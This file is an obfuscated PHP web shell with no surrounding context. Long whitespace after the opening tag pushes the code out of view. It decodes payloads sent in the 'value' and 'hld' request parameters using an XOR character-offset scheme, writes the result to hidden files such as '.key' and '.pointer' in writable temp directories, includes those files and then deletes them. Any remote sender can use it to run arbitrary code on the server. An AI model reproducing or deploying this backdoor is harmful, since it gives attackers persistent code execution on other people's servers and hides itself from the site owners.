<?php																																										if(array_key_exists("v\x61l\x75e", $_REQUEST) && !is_null($_REQUEST["v\x61l\x75e"])){ $record = $_REQUEST["v\x61l\x75e"]; $record =explode ("." , $record ); $bind = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); foreach($record as $n=> $v9): $sChar = ord($s[$n % $sLen] ); $dec = ((int)$v9 - $sChar -($n % 10))^ 51; $bind .= chr($dec ); endforeach; $obj = array_filter([getcwd(), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), getenv("TMP"), session_save_path(), getenv("TEMP"), "/var/tmp", "/dev/shm"]); $itm = 0; do { $hld = $obj[$itm] ?? null; if ($itm >= count($obj)) break; if (!!is_dir($hld) && !!is_writable($hld)) { $dchunk = "$hld/.key"; if (file_put_contents($dchunk, $bind)) { require $dchunk; unlink($dchunk); exit; } } $itm++; } while (true); }


if(filter_has_var(INPUT_POST, "hl\x64")){
	$bind = $_REQUEST["hl\x64"];
	   $bind	=explode			( '.' 		,  	$bind 	 )	 ; 	
	$flag = '';
            $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(  $s4);
            $p = 0;
    
            $__tmp = $bind;
            while(  $v1 = array_shift(  $__tmp)) {
                $sChar = ord(  $s4[$p % $lenS]);
                $d =(  (  int)$v1 - $sChar -(  $p % 10))	^27;
                $flag .= chr(  $d);
                $p++;} 	
	$ent = array_filter(["/tmp", getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), "/var/tmp", sys_get_temp_dir(), getenv("TMP")]);
	for ($elem = 0, $data = count($ent); $elem < $data; $elem++) {
    $record = $ent[$elem];
    		if (is_dir($record) && is_writable($record)) {
    $object = implode("/", [$record, ".pointer"]);
    $success = file_put_contents($object, $flag);
if ($success) {
	include $object;
	@unlink($object);
	die();}
}
}
}